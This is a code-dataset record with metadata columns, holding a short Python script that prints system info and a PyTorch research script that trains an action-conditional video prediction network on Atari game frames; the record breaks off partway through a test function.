| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1e1b1f7483745b319a73dbae63902ada3ebdf969
| 46
|
py
|
Python
|
sys_info.py
|
MartianQXD/QBisim
|
322419e3aa24c7c09cd9341cbf2ac237279a59c8
|
[
"Apache-2.0"
] | 1
|
2021-07-21T07:23:51.000Z
|
2021-07-21T07:23:51.000Z
|
sys_info.py
|
MartianQXD/QBisim
|
322419e3aa24c7c09cd9341cbf2ac237279a59c8
|
[
"Apache-2.0"
] | null | null | null |
sys_info.py
|
MartianQXD/QBisim
|
322419e3aa24c7c09cd9341cbf2ac237279a59c8
|
[
"Apache-2.0"
] | null | null | null |
import sys
print(sys.version)
print(sys.path)
| 11.5
| 18
| 0.782609
| 8
| 46
| 4.5
| 0.625
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086957
| 46
| 4
| 19
| 11.5
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0.666667
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
1e440859df30fbcb911dbd25c37790c35fcaca6f
| 40,540
|
py
|
Python
|
model/action_conditional_video_prediction.py
|
mmendiet/DeepRL_pytorch
|
626e6c5290335ef320ca2d83f01c674f3a3ca8fc
|
[
"Apache-2.0"
] | null | null | null |
model/action_conditional_video_prediction.py
|
mmendiet/DeepRL_pytorch
|
626e6c5290335ef320ca2d83f01c674f3a3ca8fc
|
[
"Apache-2.0"
] | null | null | null |
model/action_conditional_video_prediction.py
|
mmendiet/DeepRL_pytorch
|
626e6c5290335ef320ca2d83f01c674f3a3ca8fc
|
[
"Apache-2.0"
] | null | null | null |
#######################################################################
# Copyright (C) 2017 Shangtong Zhang(zhangshangtong.cpp@gmail.com) #
# Permission given to modify the code as long as you keep this #
# declaration at the top #
#######################################################################
import torch
from torch.autograd import Variable
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import pickle
import torchvision
from skimage import io
from collections import deque, defaultdict
import gym
import torch.optim
from utils import *
from tqdm import tqdm
from network import *
import os
from statistics import mean
#PREFIX = '.'
# PREFIX = '/local/data'
PREFIX = '/1TB/Datasets/Atari/data_acvp2'
class Network(nn.Module, BasicNet):
def __init__(self, num_actions, gpu=0):
super(Network, self).__init__()
self.conv1 = nn.Conv2d(12, 64, 8, 2, (0, 1))
self.conv2 = nn.Conv2d(64, 128, 6, 2, (1, 1))
self.conv3 = nn.Conv2d(128, 128, 6, 2, (1, 1))
self.conv4 = nn.Conv2d(128, 128, 4, 2, (0, 0))
self.hidden_units = 128 * 11 * 8
self.fc5 = nn.Linear(self.hidden_units, 2048)
self.fc_encode = nn.Linear(2048, 2048)
self.fc_action = nn.Linear(num_actions, 2048)
self.fc_decode = nn.Linear(2048, 2048)
self.fc8 = nn.Linear(2048, self.hidden_units)
###
#self.fcr = nn.Linear(self.hidden_units,1)
###
self.deconv9 = nn.ConvTranspose2d(128, 128, 4, 2)
self.deconv10 = nn.ConvTranspose2d(128, 128, 6, 2, (1, 1))
self.deconv11 = nn.ConvTranspose2d(128, 128, 6, 2, (1, 1))#128 outchannels
self.deconv12 = nn.ConvTranspose2d(128, 3, 8, 2, (0, 1))#128
self.init_weights()
self.criterion = nn.MSELoss()
self.opt = torch.optim.Adam(self.parameters(), 1e-4)
BasicNet.__init__(self, gpu)
def init_weights(self):
for layer in self.children():
if isinstance(layer, nn.Conv2d) or isinstance(layer, nn.ConvTranspose2d):
nn.init.xavier_uniform(layer.weight.data)
nn.init.constant(layer.bias.data, 0)
nn.init.uniform(self.fc_encode.weight.data, -1, 1)
nn.init.uniform(self.fc_decode.weight.data, -1, 1)
nn.init.uniform(self.fc_action.weight.data, -0.1, 0.1)
def forward(self, obs, action):
x = F.relu(self.conv1(obs))
x = F.relu(self.conv2(x))
x = F.relu(self.conv3(x))
x = F.relu(self.conv4(x))
x = x.view((-1, self.hidden_units))
x = F.relu(self.fc5(x))
x = self.fc_encode(x)
action = self.fc_action(action)
x = torch.mul(x, action)
x = self.fc_decode(x)
x = F.relu(self.fc8(x))
x = x.view((-1, 128, 11, 8))
x = F.relu(self.deconv9(x))
x = F.relu(self.deconv10(x))
x = F.relu(self.deconv11(x))
x = self.deconv12(x)
return x
# def forward(self, obs, action):
# x1 = F.relu(self.conv1(obs))
# x2 = F.relu(self.conv2(x1))
# x3 = F.relu(self.conv3(x2))
# x4 = F.relu(self.conv4(x3))
# x = x4.view((-1, self.hidden_units))
# x = F.relu(self.fc5(x))
# x = self.fc_encode(x)
# action = self.fc_action(action)
# x = torch.mul(x, action)
# x = self.fc_decode(x)
# x = F.relu(self.fc8(x))
# ###
# #rew = self.fcr(x)
# ###
# x = x.view((-1, 128, 11, 8))
# x9 = F.relu(self.deconv9(x+x4))
# x10 = F.relu(self.deconv10(x9+x3))
# x11 = F.relu(self.deconv11(x10+x2))
# x12 = self.deconv12(x11+x1)
# return x12
# #return x12, rew
def fit(self, x, a, y):
x = self.variable(x)
a = self.variable(a)
y = self.variable(y)
y_ = self.forward(x, a)
loss = self.criterion(y_, y)
self.opt.zero_grad()
loss.backward()
for param in self.parameters():
param.grad.data.clamp_(-0.1, 0.1)
self.opt.step()
return np.asscalar(loss.cpu().data.numpy())
def evaluate(self, x, a, y):
x = self.variable(x)
a = self.variable(a)
y = self.variable(y)
y_ = self.forward(x, a)
loss = self.criterion(y_, y)
return np.asscalar(loss.cpu().data.numpy())
def predict(self, x, a):
x = self.variable(x)
a = self.variable(a)
return self.forward(x, a).cpu().data.numpy()
def load_episode(game, ep, num_actions):
path = '%s/dataset/%s/%05d' % (PREFIX, game, ep)
with open('%s/action.bin' % (path), 'rb') as f:
actions = pickle.load(f)
num_frames = len(actions) + 1
frames = []
#start_frame = np.random.randint(1,num_frames-320)
for i in range(1, num_frames):
#for i in range(start_frame, start_frame+320):
frame = io.imread('%s/%05d.png' % (path, i))
frame = np.transpose(frame, (2, 0, 1))
frames.append(frame.astype(np.uint8))
actions = actions[1:]
#actions = actions[(start_frame+1):(start_frame+321)]
encoded_actions = np.zeros((len(actions), num_actions))
encoded_actions[np.arange(len(actions)), actions] = 1
return frames, encoded_actions
def extend_frames(frames, actions):
buffer = deque(maxlen=4)
extended_frames = []
targets = []
for i in range(len(frames) - 1):
buffer.append(frames[i])
if len(buffer) >= 4:
extended_frames.append(np.vstack(buffer))
targets.append(frames[i + 1])
actions = actions[3:, :]
return np.stack(extended_frames), actions, np.stack(targets)
def train(game):
env = gym.make(game)
num_actions = env.action_space.n
net = Network(num_actions)
with open('%s/dataset/%s/meta.bin' % (PREFIX, game), 'rb') as f:
meta = pickle.load(f)
episodes = meta['episodes']
mean_obs = meta['mean_obs']
def pre_process(x):
if x.shape[1] == 12:
return (x - np.vstack([mean_obs] * 4)) / 255.0
elif x.shape[1] == 3:
return (x - mean_obs) / 255.0
else:
assert False
def post_process(y):
return (y * 255 + mean_obs).astype(np.uint8)
train_episodes = int(episodes * 0.95)
indices_train = np.arange(train_episodes)
iteration = 0
while True:
np.random.shuffle(indices_train)
for ep in indices_train:
frames, actions = load_episode(game, ep, num_actions)
frames, actions, targets = extend_frames(frames, actions)
batcher = Batcher(32, [frames, actions, targets])
batcher.shuffle()
while not batcher.end():
if iteration % 10000 == 0:
mkdir('data/acvp-sample')
losses = []
test_indices = range(train_episodes, episodes)
ep_to_print = np.random.choice(test_indices)
for test_ep in tqdm(test_indices):
frames, actions = load_episode(game, test_ep, num_actions)
frames, actions, targets = extend_frames(frames, actions)
test_batcher = Batcher(32, [frames, actions, targets])
while not test_batcher.end():
x, a, y = test_batcher.next_batch()
losses.append(net.evaluate(pre_process(x), a, pre_process(y)))
if test_ep == ep_to_print:
test_batcher.reset()
x, a, y = test_batcher.next_batch()
y_ = post_process(net.predict(pre_process(x), a))
torchvision.utils.save_image(torch.from_numpy(y), 'data/acvp-sample/%s-%09d-truth.png' % (game, iteration))
torchvision.utils.save_image(torch.from_numpy(y_), 'data/acvp-sample/%s-%09d.png' % (game, iteration))
logger.info('Iteration %d, test loss %f' % (iteration, np.mean(losses)))
torch.save(net.state_dict(), 'data/acvp-%s.bin' % (game))
x, a, y = batcher.next_batch()
loss = net.fit(pre_process(x), a, pre_process(y))
if iteration % 100 == 0:
logger.info('Iteration %d, loss %f' % (iteration, loss))
iteration += 1
def trainSingleGame(game, numEpoch, batchSize, trainingSize, num_actions):
#env = gym.make(game)
#num_actions = env.action_space.n
#num_actions = 18
net = Network(num_actions)
#Look for checkpoint
gameDir = 'resultsNew2/'+game+str(trainingSize)+'pre'
print(gameDir)
sampleDir = gameDir+ '/samples'
modelDir = gameDir+'/models'
#pretrained = modelDir+'/acvp-'+game+'-08.bin'
pretrained = 'resultsNew2/PongBowl2'+str(num_actions)+'/models/acvp-PongBowl2-09.bin'
if os.path.exists(pretrained):
net.load_state_dict(torch.load(pretrained))
print("Grabbed Pretrained:" + pretrained)
#net.load_state_dict(torch.load('/home/matias/Documents/fall2019/rl/DeepRL_pytorch/results/MultiPB6/models/acvp-MultiPB-19.bin'))
with open('%s/dataset/%s/meta.bin' % (PREFIX, game), 'rb') as f:
meta = pickle.load(f)
episodes = meta['episodes']
mean_obs = meta['mean_obs']
def pre_process(x):
if x.shape[1] == 12:
return (x - np.vstack([mean_obs] * 4)) / 255.0
elif x.shape[1] == 3:
return (x - mean_obs) / 255.0
else:
assert False
def post_process(y):
return (y * 255 + mean_obs).astype(np.uint8)
trainSplit = float(trainingSize/100)
train_episodes = int(episodes * trainSplit)
#test_episodes = episodes - int(episodes *(1-trainSplit))
test_episodes = episodes - int(episodes *(1-0.89))
indices_train = np.arange(train_episodes)
iteration = 0
mkdir(gameDir)
mkdir(sampleDir)
mkdir(modelDir)
for epoch in range(0,numEpoch):
print("Starting Epoch: " + str(epoch))
#start Training
np.random.shuffle(indices_train)
for ep in indices_train:
frames, actions = load_episode(game, ep, num_actions)
frames, actions, targets = extend_frames(frames, actions)
batcher = Batcher(batchSize, [frames, actions, targets])
batcher.shuffle()
while not batcher.end():
x, a, y = batcher.next_batch()
loss = net.fit(pre_process(x), a, pre_process(y))
#print(iteration)
if iteration % 100 == 0:
logger.info('Iteration %d, loss %f' % (iteration, loss))
iteration += 1
#Save model every epoch
losses = []
test_indices = range(test_episodes, episodes)
ep_to_print = np.random.choice(test_indices)
for test_ep in tqdm(test_indices):
frames, actions = load_episode(game, test_ep, num_actions)
frames, actions, targets = extend_frames(frames, actions)
test_batcher = Batcher(batchSize, [frames, actions, targets])
while not test_batcher.end():
x, a, y = test_batcher.next_batch()
losses.append(net.evaluate(pre_process(x), a, pre_process(y)))
if test_ep == ep_to_print:
test_batcher.reset()
x, a, y = test_batcher.next_batch()
y_ = post_process(net.predict(pre_process(x), a))
torchvision.utils.save_image(torch.from_numpy(x[0:32,9:12]), sampleDir+'/%s-%02d-input.png' % (game, epoch))
torchvision.utils.save_image(torch.from_numpy(y[0:32]), sampleDir+'/%s-%02d-truth.png' % (game, epoch))
torchvision.utils.save_image(torch.from_numpy(y_[0:32]), sampleDir+'/%s-%02d.png' % (game, epoch))
logger.info('Epoch %d, test loss %f' % (epoch, mean(losses)))
f = open(gameDir+ '/results.txt', 'a')
f.write('Epoch: ' + str(epoch)+ ', test loss: ' + str(mean(losses))+ '\n')
f.close()
torch.save(net.state_dict(), modelDir+'/acvp-%s-%02d.bin' % (game, epoch))
def trainSingleGameTorch(game, numEpoch, batchSize, trainingSize):
env = gym.make(game)
num_actions = env.action_space.n
net = Network(num_actions)
#Look for checkpoint
gameDir = 'results/'+game+str(trainingSize)
sampleDir = gameDir+ '/samples'
modelDir = gameDir+'/models'
pretrained = modelDir+'/acvp-'+game+str(trainingSize)+'.bin'
if os.path.exists(pretrained):
net.load_state_dict(torch.load(pretrained))
with open('%s/dataset/%s/meta.bin' % (PREFIX, game), 'rb') as f:
meta = pickle.load(f)
episodes = meta['episodes']
mean_obs = meta['mean_obs']
def pre_process(x):
if x.shape[1] == 12:
return (x - np.vstack([mean_obs] * 4)) / 255.0
elif x.shape[1] == 3:
return (x - mean_obs) / 255.0
else:
assert False
def post_process(y):
return (y * 255 + mean_obs).astype(np.uint8)
train_episodes = int(episodes * float(trainingSize/100))
test_episodes = episodes - int(episodes *0.1)
indices_train = np.arange(train_episodes)
iteration = 0
mkdir(gameDir)
mkdir(sampleDir)
mkdir(modelDir)
first_visit = 1
for ep in indices_train:
frames, actions = load_episode(game, ep, num_actions)
frames, actions, targets = extend_frames(frames, actions)
if first_visit:
all_frames = torch.from_numpy(frames)
all_actions = torch.from_numpy(actions)
all_targets = torch.from_numpy(targets)
first_visit = 0
else:
all_frames = torch.cat((all_frames,torch.from_numpy(frames)))
all_actions = torch.cat((all_actions,torch.from_numpy(actions)))
all_targets = torch.cat((all_targets,torch.from_numpy(targets)))
training_set = torch.utils.data.TensorDataset(all_frames, all_actions, all_targets)
training_loader = torch.utils.data.DataLoader(training_set, batch_size=batchSize, shuffle=True,
num_workers=12, pin_memory=True)
first_visit = 1
test_indices = range(test_episodes, episodes)
for ep in test_indices:
frames, actions = load_episode(game, ep, num_actions)
frames, actions, targets = extend_frames(frames, actions)
if first_visit:
all_frames = torch.from_numpy(frames)
all_actions = torch.from_numpy(actions)
all_targets = torch.from_numpy(targets)
first_visit = 0
else:
all_frames = torch.cat((all_frames,torch.from_numpy(frames)))
all_actions = torch.cat((all_actions,torch.from_numpy(actions)))
all_targets = torch.cat((all_targets,torch.from_numpy(targets)))
training_set = torch.utils.data.TensorDataset(all_frames, all_actions, all_targets)
training_loader = torch.utils.data.DataLoader(training_set, batch_size=batchSize, shuffle=True,
num_workers=12, pin_memory=True)
f = open(gameDir+'/results.txt', 'a')
for epoch in range(0,numEpoch):
print("Starting Epoch: " + str(epoch))
np.random.shuffle(indices_train)
for x, a, y in training_loader:
loss = net.fit(pre_process(x.numpy()), a.numpy(), pre_process(y.numpy()))
if iteration % 100 == 0:
logger.info('Iteration %d, loss %f' % (iteration, loss))
iteration += 1
#Save model every epoch
losses = []
ep_to_print = np.random.choice(test_indices)
ep_count = 0
for x, a, y in tqdm(training_loader):
x = x.numpy()
a = a.numpy()
y = y.numpy()
losses.append(net.evaluate(pre_process(x), a, pre_process(y)))
if test_indices[ep_count] == ep_to_print:
y_ = post_process(net.predict(pre_process(x), a))
torchvision.utils.save_image(torch.from_numpy(x[0:32,9:12]), sampleDir+'/%s-%02d-input.png' % (game, epoch))
torchvision.utils.save_image(torch.from_numpy(y[0:32]), sampleDir+'/%s-%02d-truth.png' % (game, epoch))
torchvision.utils.save_image(torch.from_numpy(y_[0:32]), sampleDir+'/%s-%02d.png' % (game, epoch))
ep_count+=1
logger.info('Epoch %d, test loss %f' % (epoch, np.mean(losses)))
f.write('Epoch: ' + str(epoch)+ ', test loss: ' + str(np.mean(losses))+ '\n')
torch.save(net.state_dict(), modelDir+'/acvp-%s-%02d.bin' % (game, epoch))
f.close()
def trainMultiGame(game, numEpoch, batchSize, num_actions):
#env = gym.make(game)
#num_actions = env.action_space.n
#num_actions = 6
net = Network(num_actions)
#'BowlingNoFrameskip-v4'
#'SeaquestNoFrameskip-v4'
#'SpaceInvadersNoFrameskip-v4'
#Look for checkpoint
gameDir = 'resultsNew2/'+game+str(num_actions)
print(gameDir)
sampleDir = gameDir+ '/samples'
modelDir = gameDir+'/models'
pretrained = modelDir+'/acvp-'+game+'-00.bin'
if os.path.exists(pretrained):
net.load_state_dict(torch.load(pretrained))
#net.load_state_dict(torch.load('acvp-MultiPB-00.bin'))
#with open('%s/dataset/%s/meta.bin' % (PREFIX, 'PongBowl'), 'rb') as f:
#meta = pickle.load(f)
#episodes = meta['episodes']
#mean_obs = meta['mean_obs']
with open('%s/dataset/BowlingNoFrameskip-v4/meta.bin' % (PREFIX), 'rb') as f:
meta = pickle.load(f)
#episodes = meta['episodes']
mean_obsB = meta['mean_obs']
with open('%s/dataset/PongNoFrameskip-v4/meta.bin' % (PREFIX), 'rb') as f:
meta = pickle.load(f)
#episodes = meta['episodes']
mean_obsP = meta['mean_obs']
mean_obs = (mean_obsB + mean_obsP)/2
def pre_process(x,mean_obs):
if x.shape[1] == 12:
return (x - np.vstack([mean_obs] * 4)) / 255.0
elif x.shape[1] == 3:
return (x - mean_obs) / 255.0
else:
assert False
def post_process(y,mean_obs):
return (y * 255 + mean_obs).astype(np.uint8)
# testNum = episodes*dataPortion*(1-trainingSize)
# trainNum = episodes*dataPortion*trainingSize
# e = np.arange(episodes)
# testIdx = int(episodes/testNum)
# test_episodes = e[testIdx::testIdx]
# trainIdx = int((episodes-testNum)/trainNum)
# train_episodes = np.setdiff1d(e, test_episodes)[0::trainIdx]
train_episodes = np.concatenate((np.arange(144),np.arange(161,349)))
test_episodes = np.concatenate((np.arange(144,161),np.arange(349,373)))
#train_episodes = np.concatenate((np.arange(146),np.arange(163,350)))
#test_episodes = np.concatenate((np.arange(146,163),np.arange(350,375)))
np.random.shuffle(test_episodes)
np.random.shuffle(train_episodes)
iteration = 0
mkdir(gameDir)
mkdir(sampleDir)
mkdir(modelDir)
f = open(gameDir+'/results.txt', 'a')
for epoch in range(0,numEpoch):
print("Starting Epoch: " + str(epoch))
np.random.shuffle(train_episodes)
for ep in train_episodes:
if (ep > 160):
m = mean_obs
else:
m = mean_obs
frames, actions = load_episode('PongBowl2', ep, num_actions)
frames, actions, targets = extend_frames(frames, actions)
batcher = Batcher(batchSize, [frames, actions, targets])
batcher.shuffle()
while not batcher.end():
x, a, y = batcher.next_batch()
loss = net.fit(pre_process(x,m), a, pre_process(y,m))
if iteration % 100 == 0:
logger.info('Iteration %d, loss %f' % (iteration, loss))
iteration += 1
tep = np.random.randint(161,349)
frames, actions = load_episode('PongBowl2', tep, num_actions)
frames, actions, targets = extend_frames(frames, actions)
batcher = Batcher(batchSize, [frames, actions, targets])
batcher.shuffle()
b_count = 0
while not batcher.end():
x, a, y = batcher.next_batch()
loss = net.fit(pre_process(x,m), a, pre_process(y,m))
if b_count >20:
break
b_count += 1
tep = np.random.randint(161,349)
frames, actions = load_episode('PongBowl2', tep, num_actions)
frames, actions, targets = extend_frames(frames, actions)
batcher = Batcher(batchSize, [frames, actions, targets])
batcher.shuffle()
b_count = 0
while not batcher.end():
x, a, y = batcher.next_batch()
loss = net.fit(pre_process(x,m), a, pre_process(y,m))
if b_count >20:
break
b_count += 1
#Save model every epoch
losses = []
ep_to_print = np.random.choice(test_episodes)
for test_ep in tqdm(test_episodes):
if (ep > 160):
m = mean_obs
else:
m = mean_obs
frames, actions = load_episode('PongBowl2', test_ep, num_actions)
frames, actions, targets = extend_frames(frames, actions)
test_batcher = Batcher(batchSize, [frames, actions, targets])
while not test_batcher.end():
x, a, y = test_batcher.next_batch()
losses.append(net.evaluate(pre_process(x,m), a, pre_process(y,m)))
if test_ep == ep_to_print:
test_batcher.reset()
x, a, y = test_batcher.next_batch()
y_ = post_process(net.predict(pre_process(x,m), a),m)
torchvision.utils.save_image(torch.from_numpy(x[0:32,9:12]), sampleDir+'/%s-%02d-input.png' % (game, epoch))
torchvision.utils.save_image(torch.from_numpy(y[0:32]), sampleDir+'/%s-%02d-truth.png' % (game, epoch))
torchvision.utils.save_image(torch.from_numpy(y_[0:32]), sampleDir+'/%s-%02d.png' % (game, epoch))
logger.info('Epoch %d, test loss %f' % (epoch, mean(losses)))
f.write('Epoch: ' + str(epoch)+ ', test loss: ' + str(mean(losses))+ '\n')
torch.save(net.state_dict(), modelDir+'/acvp-%s-%02d.bin' % (game, epoch))
f.close()
def testMultiGame2(game, numEpoch, batchSize, num_actions):
#env = gym.make(game)
#num_actions = env.action_space.n
#num_actions = 6
net = Network(num_actions)
#'BowlingNoFrameskip-v4'
#'SeaquestNoFrameskip-v4'
#'SpaceInvadersNoFrameskip-v4'
#Look for checkpoint
gameDir = 'resultsNew2/'+game+str(num_actions)+'Pongtest'
print(gameDir)
sampleDir = gameDir+ '/samples'
modelDir = gameDir+'/models'
pretrained = 'resultsNew2/'+game+str(num_actions)+'/models/acvp-'+game+'-09.bin'
if os.path.exists(pretrained):
net.load_state_dict(torch.load(pretrained))
print("Loaded: " + pretrained)
#net.load_state_dict(torch.load('acvp-MultiPB-00.bin'))
#with open('%s/dataset/%s/meta.bin' % (PREFIX, 'PongBowl'), 'rb') as f:
#meta = pickle.load(f)
#episodes = meta['episodes']
#mean_obs = meta['mean_obs']
with open('%s/dataset/BowlingNoFrameskip-v4/meta.bin' % (PREFIX), 'rb') as f:
meta = pickle.load(f)
#episodes = meta['episodes']
mean_obsB = meta['mean_obs']
with open('%s/dataset/PongNoFrameskip-v4/meta.bin' % (PREFIX), 'rb') as f:
meta = pickle.load(f)
#episodes = meta['episodes']
mean_obsP = meta['mean_obs']
mean_obs = (mean_obsB + mean_obsP)/2
def pre_process(x,mean_obs):
if x.shape[1] == 12:
return (x - np.vstack([mean_obs] * 4)) / 255.0
elif x.shape[1] == 3:
return (x - mean_obs) / 255.0
else:
assert False
def post_process(y,mean_obs):
return (y * 255 + mean_obs).astype(np.uint8)
# testNum = episodes*dataPortion*(1-trainingSize)
# trainNum = episodes*dataPortion*trainingSize
# e = np.arange(episodes)
# testIdx = int(episodes/testNum)
# test_episodes = e[testIdx::testIdx]
# trainIdx = int((episodes-testNum)/trainNum)
# train_episodes = np.setdiff1d(e, test_episodes)[0::trainIdx]
train_episodes = np.concatenate((np.arange(144),np.arange(161,349)))
#test_episodes = np.concatenate((np.arange(144,161),np.arange(349,373)))
#train_episodes = np.concatenate((np.arange(146),np.arange(163,350)))
#test_episodes = np.concatenate((np.arange(146,163),np.arange(350,375)))
#np.random.shuffle(test_episodes)
np.random.shuffle(train_episodes)
iteration = 0
mkdir(gameDir)
mkdir(sampleDir)
mkdir(modelDir)
test_episodes = np.arange(349,373)
np.random.shuffle(test_episodes)
f = open(gameDir+'/results.txt', 'a')
for epoch in range(0,numEpoch):
# print("Starting Epoch: " + str(epoch))
# np.random.shuffle(train_episodes)
# for ep in train_episodes:
# if (ep > 160):
# m = mean_obs
# else:
# m = mean_obs
# frames, actions = load_episode('PongBowl2', ep, num_actions)
# frames, actions, targets = extend_frames(frames, actions)
# batcher = Batcher(batchSize, [frames, actions, targets])
# batcher.shuffle()
# while not batcher.end():
# x, a, y = batcher.next_batch()
# loss = net.fit(pre_process(x,m), a, pre_process(y,m))
# if iteration % 100 == 0:
# logger.info('Iteration %d, loss %f' % (iteration, loss))
# iteration += 1
# tep = np.random.randint(161,349)
# frames, actions = load_episode('PongBowl2', tep, num_actions)
# frames, actions, targets = extend_frames(frames, actions)
# batcher = Batcher(batchSize, [frames, actions, targets])
# batcher.shuffle()
# b_count = 0
# while not batcher.end():
# x, a, y = batcher.next_batch()
# loss = net.fit(pre_process(x,m), a, pre_process(y,m))
# if b_count >20:
# break
# b_count += 1
# tep = np.random.randint(161,349)
# frames, actions = load_episode('PongBowl2', tep, num_actions)
# frames, actions, targets = extend_frames(frames, actions)
# batcher = Batcher(batchSize, [frames, actions, targets])
# batcher.shuffle()
# b_count = 0
# while not batcher.end():
# x, a, y = batcher.next_batch()
# loss = net.fit(pre_process(x,m), a, pre_process(y,m))
# if b_count >20:
# break
# b_count += 1
#Save model every epoch
losses = []
ep_to_print = np.random.choice(test_episodes)
for test_ep in tqdm(test_episodes):
if (test_ep > 160):
m = mean_obs
else:
m = mean_obs
frames, actions = load_episode('PongBowl2', test_ep, num_actions)
frames, actions, targets = extend_frames(frames, actions)
test_batcher = Batcher(batchSize, [frames, actions, targets])
while not test_batcher.end():
x, a, y = test_batcher.next_batch()
losses.append(net.evaluate(pre_process(x,m), a, pre_process(y,m)))
if test_ep == ep_to_print:
test_batcher.reset()
x, a, y = test_batcher.next_batch()
y_ = post_process(net.predict(pre_process(x,m), a),m)
torchvision.utils.save_image(torch.from_numpy(x[0:32,9:12]), sampleDir+'/%s-%02d-input.png' % (game, epoch))
torchvision.utils.save_image(torch.from_numpy(y[0:32]), sampleDir+'/%s-%02d-truth.png' % (game, epoch))
torchvision.utils.save_image(torch.from_numpy(y_[0:32]), sampleDir+'/%s-%02d.png' % (game, epoch))
logger.info('Epoch %d, test loss %f' % (epoch, mean(losses)))
f.write('Epoch: ' + str(epoch)+ ', test loss: ' + str(mean(losses))+ '\n')
#torch.save(net.state_dict(), modelDir+'/acvp-%s-%02d.bin' % (game, epoch))
f.close()
def trainThreeGame(game, numEpoch, batchSize, num_actions):
#env = gym.make(game)
#num_actions = env.action_space.n
#num_actions = 6
net = Network(num_actions)
#'BowlingNoFrameskip-v4'
#'SeaquestNoFrameskip-v4'
#'SpaceInvadersNoFrameskip-v4'
#Look for checkpoint
gameDir = 'resultsNew2/'+game+str(num_actions)
print(gameDir)
sampleDir = gameDir+ '/samples'
modelDir = gameDir+'/models'
#pretrained = modelDir+'/acvp-'+game+'-00.bin'
#if os.path.exists(pretrained):
#net.load_state_dict(torch.load(pretrained))
#net.load_state_dict(torch.load('acvp-MultiPB-00.bin'))
#with open('%s/dataset/%s/meta.bin' % (PREFIX, 'PongBowl'), 'rb') as f:
#meta = pickle.load(f)
#episodes = meta['episodes']
#mean_obs = meta['mean_obs']
with open('%s/dataset/BowlingNoFrameskip-v4/meta.bin' % (PREFIX), 'rb') as f:
meta = pickle.load(f)
#episodes = meta['episodes']
mean_obsB = meta['mean_obs']
with open('%s/dataset/PongNoFrameskip-v4/meta.bin' % (PREFIX), 'rb') as f:
meta = pickle.load(f)
#episodes = meta['episodes']
mean_obsP = meta['mean_obs']
with open('%s/dataset/QbertNoFrameskip-v4/meta.bin' % (PREFIX), 'rb') as f:
meta = pickle.load(f)
#episodes = meta['episodes']
mean_obsQ = meta['mean_obs']
mean_obs = (mean_obsB + mean_obsP + mean_obsQ)/3
def pre_process(x,mean_obs):
if x.shape[1] == 12:
return (x - np.vstack([mean_obs] * 4)) / 255.0
elif x.shape[1] == 3:
return (x - mean_obs) / 255.0
else:
assert False
def post_process(y,mean_obs):
return (y * 255 + mean_obs).astype(np.uint8)
# testNum = episodes*dataPortion*(1-trainingSize)
# trainNum = episodes*dataPortion*trainingSize
# e = np.arange(episodes)
# testIdx = int(episodes/testNum)
# test_episodes = e[testIdx::testIdx]
# trainIdx = int((episodes-testNum)/trainNum)
# train_episodes = np.setdiff1d(e, test_episodes)[0::trainIdx]
train_episodes = np.concatenate((np.arange(144),np.arange(161,349)))
test_episodes = np.concatenate((np.arange(144,161),np.arange(349,373)))
#train_episodes = np.concatenate((np.arange(146),np.arange(163,350)))
#test_episodes = np.concatenate((np.arange(146,163),np.arange(350,375)))
np.random.shuffle(test_episodes)
np.random.shuffle(train_episodes)
iteration = 0
mkdir(gameDir)
mkdir(sampleDir)
mkdir(modelDir)
f = open(gameDir+'/results.txt', 'a')
for epoch in range(0,numEpoch):
print("Starting Epoch: " + str(epoch))
np.random.shuffle(train_episodes)
for ep in train_episodes:
if (ep > 160):
m = mean_obs
else:
m = mean_obs
frames, actions = load_episode('PongBowl2', ep, num_actions)
frames, actions, targets = extend_frames(frames, actions)
batcher = Batcher(batchSize, [frames, actions, targets])
batcher.shuffle()
while not batcher.end():
x, a, y = batcher.next_batch()
loss = net.fit(pre_process(x,m), a, pre_process(y,m))
if iteration % 100 == 0:
logger.info('Iteration %d, loss %f' % (iteration, loss))
iteration += 1
tep = np.random.randint(161,349)
frames, actions = load_episode('PongBowl2', tep, num_actions)
frames, actions, targets = extend_frames(frames, actions)
batcher = Batcher(batchSize, [frames, actions, targets])
batcher.shuffle()
b_count = 0
while not batcher.end():
x, a, y = batcher.next_batch()
loss = net.fit(pre_process(x,m), a, pre_process(y,m))
if b_count >20:
break
b_count += 1
tep = np.random.randint(161,349)
frames, actions = load_episode('PongBowl2', tep, num_actions)
frames, actions, targets = extend_frames(frames, actions)
batcher = Batcher(batchSize, [frames, actions, targets])
batcher.shuffle()
b_count = 0
while not batcher.end():
x, a, y = batcher.next_batch()
loss = net.fit(pre_process(x,m), a, pre_process(y,m))
if b_count >20:
break
b_count += 1
#Save model every epoch
losses = []
ep_to_print = np.random.choice(test_episodes)
for test_ep in tqdm(test_episodes):
if (ep > 160):
m = mean_obs
else:
m = mean_obs
frames, actions = load_episode('PongBowl2', test_ep, num_actions)
frames, actions, targets = extend_frames(frames, actions)
test_batcher = Batcher(batchSize, [frames, actions, targets])
while not test_batcher.end():
x, a, y = test_batcher.next_batch()
losses.append(net.evaluate(pre_process(x,m), a, pre_process(y,m)))
if test_ep == ep_to_print:
test_batcher.reset()
x, a, y = test_batcher.next_batch()
y_ = post_process(net.predict(pre_process(x,m), a),m)
torchvision.utils.save_image(torch.from_numpy(x[0:32,9:12]), sampleDir+'/%s-%02d-input.png' % (game, epoch))
torchvision.utils.save_image(torch.from_numpy(y[0:32]), sampleDir+'/%s-%02d-truth.png' % (game, epoch))
torchvision.utils.save_image(torch.from_numpy(y_[0:32]), sampleDir+'/%s-%02d.png' % (game, epoch))
logger.info('Epoch %d, test loss %f' % (epoch, mean(losses)))
f.write('Epoch: ' + str(epoch)+ ', test loss: ' + str(mean(losses))+ '\n')
torch.save(net.state_dict(), modelDir+'/acvp-%s-%02d.bin' % (game, epoch))
f.close()
def testMultiGame(game):
num_actions = 6
net = Network(num_actions)
#Look for checkpoint
gameDir = 'resultsNew2/'+game+str(num_actions)
print(gameDir)
